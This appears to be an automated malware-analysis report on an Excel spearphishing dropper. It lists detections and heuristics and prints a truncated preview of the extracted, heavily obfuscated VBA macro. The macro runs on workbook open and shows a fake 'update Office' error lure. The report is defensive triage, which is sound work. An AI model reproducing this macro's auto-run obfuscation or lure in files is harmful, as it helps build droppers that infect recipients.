MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic indicates the file is a known dropper (Doc.Dropper.Agent-6601592-0). The presence of a Workbook_Open VBA macro, coupled with a CreateObject call, strongly suggests the macro is designed to execute malicious code upon opening. The macro's content, though truncated, includes a message box prompt about updating Office, which is a common social engineering tactic.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6601592-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6601592-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15925 bytes |
SHA-256: ef8c7663104594a49e6df352e6bf306b8bea637ffccf36a11750e2f92c25d748 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
OzqB.ETpZX5PqZJVHyJg16kLl
Dim SkOddoNV_jsArR As Byte
If YnKyaut51PNNaZN8bUethd_K6rp4lyaTZet = nFIZ1Wt9NNMxGFFVe7t5h92r_zRAx4x6oTRUKD2IsE6pd Then
Dim vdr_xbtyTnMaTA_sITZQHvwtJZDiJb As Workbook
Dim BKLLDwQs_UJy_mGsr1__5kOLr9q83W As String
End If
Dim WJm2lAMG7PZZNDERuIkZqLdJfZ6_cDESyq7_KG As Byte
If AFej4widUJEYL = fUboJpbTJDMm Then
Dim JEjgEEEmHc5EQpj As Workbook
Dim ADu3Dzi7VAvRsvyBP7Alb3wD_SiW1gh291SFRTiBkGMfR As String
End If
Dim vVzRamHOCGGOp2tOJEya4 As Byte
If S2brs6W9ASnPt = L6rDY3Yk6rJzkaxuYBXDX Then
Dim bcVjqpuPBwb95nwgFo5BRWHP2GdhMk As Workbook
Dim QNKUtaTbrLmT35rzovAMRVcB__TEriJLCYeLvi4TKm As String
End If
Dim qW8cMhAaqf9R4uIOnFNtHAZPbXdCE1pBnY As Byte
If umFkFfpFboCFjalRNM62wo7p_xD7Uzz7md9fG = C9rCAguMUxCZvlbEvk_oZkRaru Then
Dim lyEc_a_IKMLxvGKam9A As Workbook
Dim fhMW11331qapPSO45F2sjTlYM27y7c87RYKK As String
End If
Dim XZNkKgMbtf6dfLOTuOYJ6wH84D6V As Byte
If rcVzGCed2OfCF = Hoq6bQtLmJC__NkQOqGkztOH_UbpuberVDwFaBauJI_ Then
Dim RSyFw3KkgXaOXYgzEyCaInSm6acz As Workbook
Dim MOUYpo6yNMnwh18S5wWq3JT5Gr4m9KJUYUVPBA As String
End If
khVK58Q = MsgBox("Actualizar version de Office", vbCritical, "Error en libreria Microsoft")
Dim isbrj2IO2Rp_rGDv As Byte
If B5YQ8tQyCBRVKcpP3MnMJjbu1yj79c = CPlYSUksk8J2gyz2px9rx3YhtabnZ Then
Dim HITzh9AtvHToIloCRCl48Gu8OnH1Cn As Workbook
Dim QbxyA8yxG3omCnPseaWysa_WUi3yIpFOar As String
End If
Dim I1LPDv_zMETL_2GgLdCLz As Byte
If aYbZD_nZvXJSwF2 = RIRBnkuQAV37 Then
Dim AH4uXe_qasy_vYXaqH2KuONBJAgN As Workbook
Dim pFZDIBlQ1luxvXZhSRNMKRj2cqKu31jW As String
End If
Dim uASQuyswFjDVDYUxoq2uSBVfhibz1W As Byte
If BW1_WFOhbeZDrfdYPy7MIqklrmvsJU26sj = A9LX8qYHXO37n_DIJA Then
Dim IySuMPsSfWElcTFdeL2zNw_RUru As Workbook
Dim vn_J1BhupL8FNW2uQmXlfdg6RInUxAYeetg1V5tauUwR As String
End If
Dim Ntkz5N_rRGaPFC1pV As Byte
If L6nvbjcz_WV27zJqNqhhxZiAqKVQOtRDD_hYGe = vHF_4zmzUQPi1URFhvVm_OLK Then
Dim iN_Qw1Pthr5XawerV1y_Ap27u6fvCdZe5 As Workbook
Dim YouTBdAe_HY3otOnOMYGI2UGfzTdqDPYcfWz6BxTDdosf2Pve As String
End If
Dim WML_vtfRmxJIfx61_YH As Byte
If VYqMX_DoKljnig8RzCSpvzg = RLlJgps1faGYEp9x_rDSoBH Then
Dim kkgdEworVe2X_u3f9btDKZG2lzNS7 As Workbook
Dim qe1OD_i9JmCzsu3LQ8BFK_1487Jbo1NhUun_AG6uSfwyqLbn As String
End If
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "OzqB"
Dim AWYbM5aiAlICElynkc7xb4gROlLzN7nY_rsfELZ1LtIQSQkFTb3rA7rFyELjrkSD7tCV2QgWC_jrtN88A_evC6WC_kp9_ As String
Dim CT_yz5LLbZKqdhTbJz6YERkrfkR1QvAIU8CgFSJTiZxj_C_73gUeWs3tsURNlT4pYBUedvUznkyncAqbjU8tZduk_Qxt_6rMeGJ8qcaEKd1u3MOqm As Integer
Dim F3tB3l5Zlvsq14Pg2_XZmFu3zwCC7nQNGA42vrvNoHRoYCJrF5QxVsN_F1K_i1c7ddhy_WtIRItcx_bvkT6AVb1Xu4u5epowoTJ5cUqsIFeL8uJ As String
Dim pknN8H8WeMMN5M1hSh5ykw_WNXXD12hixtQz_Dbh_WutitREW8l As String
Function MnT2LLukn6QEyERSWdd8E3KIAOvnQBLudeM_fVTH(aCLcBpYo6WpO3Am3CgBJ4UYZK_bVZ3vyhaixpCMFHGwntSW2a8tAv5CEmvPBMBMCkzpaZyK_S4Avgup2ki5aHtClWcI4uJ)
Dim eXxZRPeZGPct4KkiR6b46mf As Byte
If gj5RHDf_zzhHC5b9EeChSYngL6A2ga9E12OzW8UVkOm3TB = hnz7VW2_KF5W_KCmbW1aQInkkFIp6DvuKIWU Then
Dim Bj_jMvpG492HR7wNB2tW9MTNMKHFTIK5xpk1RO As Workbook
Dim MecfqkM_V8PgrRY9VwNyUBlhwsw7TlU55unN4bfr_MxIzvZ2exSwlb4K2 As String
End If
Dim s7xPotlUk7nI_4PeyGLbr_R4aeQgQbz As Byte
If aV9ri4shDgdIcL = TsYfEmu8XKrn3yHb_CHEKw_Jpk_hH5MzxpEu1_Ky_c7w_5 Then
Dim XkbZAVAfnNycgKyc72yLrVjDzSArzPIukJIgbv As Workbook
Dim xaohElJqP2nbzG_wJA_WjqTQpW_C2VBPAJCWfHO83GBHDWYAox9GfDK As String
End If
Dim FEV2rfFy3yVZoD As Byte
If qOBuBdanKMQ7CVCW4t786PHPgZuQHSp6t67g7Vdhta4Hit = csvd4lcpGZ The
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.